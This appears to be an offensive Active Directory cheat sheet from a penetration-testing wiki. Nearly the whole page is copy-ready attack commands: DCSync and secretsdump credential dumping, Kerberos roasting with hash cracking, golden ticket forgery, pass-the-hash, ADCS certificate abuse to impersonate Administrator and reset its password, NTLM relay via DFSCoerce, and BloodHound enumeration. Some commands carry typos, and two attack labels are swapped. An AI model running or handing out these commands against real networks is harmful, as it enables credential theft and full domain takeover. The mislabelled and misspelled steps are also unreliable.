Copy Import-Module DSInternals
$cred=Get-Credential
Get-ADReplAccount -SamAccountName <victim username> -Server <Domain IP> -Credential $cred -Protocol TCP
Carry out a Kerberos roasting
Copy python3 GetNPUsers.py <domain/> -dc-ip <domain ip> -usersfile <username.txt> -format hashcat Crack the Hash
Copy john <hash file> --wordlist=/usr/share/wordlists/rockyou.txt
Run a no-preauthentication attack
Copy python3 GetUserSPNs.py cybex.com/jdoe76:JDPass2021 -dc-ip <domain ip> -request
Copy john <hash file> --wordlist=/usr/share/wordlists/rockyou.txt
Forge a golden ticket (Post Exploitation)
Prerequisite
Must be a local admin before doing this attack
Get the NT hash of Kerberos TGT
Copy sudo python3 secretsdump.py cybex.com/aadama31:BlueMarble22@<domain ip>
Copy the NT hash for the user "krbtgt"
Copy the Computer Name
Extract the Domain SID
Copy sudo python3 lookupsid.py cybex.com/aadama31:BlueMarble22@<domain ip> Forge the Golden-Ticket
Copy sudo python3 ticket.py -nthash <krbtgt hash> -domain-sid '<domain sid>' -domain cybex.com <username to create a ticket for> Use the Golden-Ticket
Copy export KRB5CCNAME=/usr/share/doc/python3-impacket/examples/akatt42.ccache
Copy sudo python3 psexec.py cybex.com/akatt42@<computer name> -target-ip <domain ip> -dc-ip <domain ip> -no-pass -k
Note: "akatt42" is the username for which we have create the golden ticket previously.
Running a shadow attack
Certipy Tool
Copy sudo pip3 install certipy-ad
Copy certipy shadow auto -u sspade@cybex.com -p Scorpion5 -dc-ip 192.168.1.5 -account adamant Pass The Hash Attack
Copy crackmapexec winrm <domain ip> -d cybex -u "adamant" -H <NT hash> -x ";hostname;whoami"
Taking over the domain using rubeus (Privilege Escalation)
Identify a Vulnerable Certificate Template
Copy certify.exe find /vulnerable Request the Certificate
Copy certify.exe request /ca:CA01.cybex.com\cybex-CA01 /template:PowerUser /altname:Administrator
Make sure to copy the whole body (from BEGIN RSA PRIVATE KEY to END CERTIFICATE). In order to successfully convert it we must have the private key itself.
Convert .pem file to .pfx file
Copy openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Host a python http server and transfer back the .pfx.
Now the next step is to simply generate and inject ticket for the issued certificate and enjoy being Administrator.
Rubeus
Copy .\rebues asttgt /user:Administrator /certificate:admin.pfx /outfile:admin.tkt /ptt Change the Domain Admin Password
Copy .\rubeus changepw /new:BaronDielm4 /dc:DC01.cybex.com /targetuser:cybex.com\Administrator /tciket:admin.tkt
Login to the domain admin account using the new password.
Relaying attacks to get a certificate
DFSCoerce
Set up a Man-In-The-Middle relay server
Copy ntlmrelayx.py -smb2support -t https://192.168.1.6/certsrv/certfnsh.asp --adcs --template DomainController Using DFSCoerce
Copy python3 dfscoerce.py -u sspade -d cybex.com 192.168.1.249 192.168.1.5
Save the baset64 encoded certificate
Decode the Certificate
Copy cat cert64 | base64 -d > dc01.pfx
Copy certipy auth -pfx dc01.pfx -dc-ip <domain ip>
Using smartcards to gain privileged access
Create a Smartcard
Copy cmd> tpmvscmgr create /name samvsc /pin default /adminkey random /generate PoshADCS
PowerView
Execute PowerView
Copy PS> cat -raw PowerView.ps1 | iex Execute PoshADCS
Copy PS> cat -raw ADCS.ps1 | iex Check the Access level
Copy Get-ADCSTemplateACL -Name PowerUser | Format-Table AceQualified,Identity,ActiveDirectoryRights Requtst for Domain Admin
Copy Get-SmartCardCertificate -Template Poweruser -Identity offsec
offsec user is the domain administrator
Enter the PIN we have created previously
Check the virtual smart card
Set the BloodHound loose
Copy $ .local/bin/bloodhound-python -u jdoe76 -p JDPass2021 -ns <name server ip> -d cybex.com -c all Start neo4j
Change the Credentials for neo4j
Run BloodHound
Ente the neo4j username and password
Last updated 7 months ago
